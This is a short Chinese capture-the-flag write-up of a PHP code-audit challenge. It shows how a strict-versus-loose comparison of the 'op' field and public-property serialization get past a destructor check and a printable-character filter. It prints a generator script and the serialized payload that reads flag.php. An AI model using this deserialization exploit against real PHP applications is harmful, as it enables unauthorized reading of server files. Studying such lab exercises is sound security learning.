打开后发现是代码审计的题(虽然很长,但很简单)
好长一串代码,刚开始做都不想看,想放弃,但还是继续读下去了,而且还差点做出来了
可以看到这里定义了一个filehandler类,可以读代码,写入代码
我首先就想到了当0p=2的时候可以读出flag.php的内容,又可以看到
在析构函数中:
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
在process函数中:
if($this->op == "2") {
$res = $this->read();
$this->output($res);
一个是三个等号,一个是两个,嘿嘿那不就绕过了吗?直接0p=2了
下面有一个is_valid函数:
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
它的作用是检测可以显示的字符,但是这里的类是protect类型的,在生成序列化时,是这种形式的
%00*%00属性名,其中的%00是不可见的,绕过不了这个函数,卡住了
然后百度了一下,看了一下大佬的wp,说的是在php7.1的环境下对属性的要求不是很敏感,在这里可以用public属性,然后绕过。(又学到了一招)
<?php
class FileHandler {
public $op=2;
public $filename="flag.php";
public $content;
}
$a=new FileHandler;
echo serialize($a);
?>
然后payload:/?str=O:11:“FileHandler”:3:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}
拿到在源码里面显示的flag
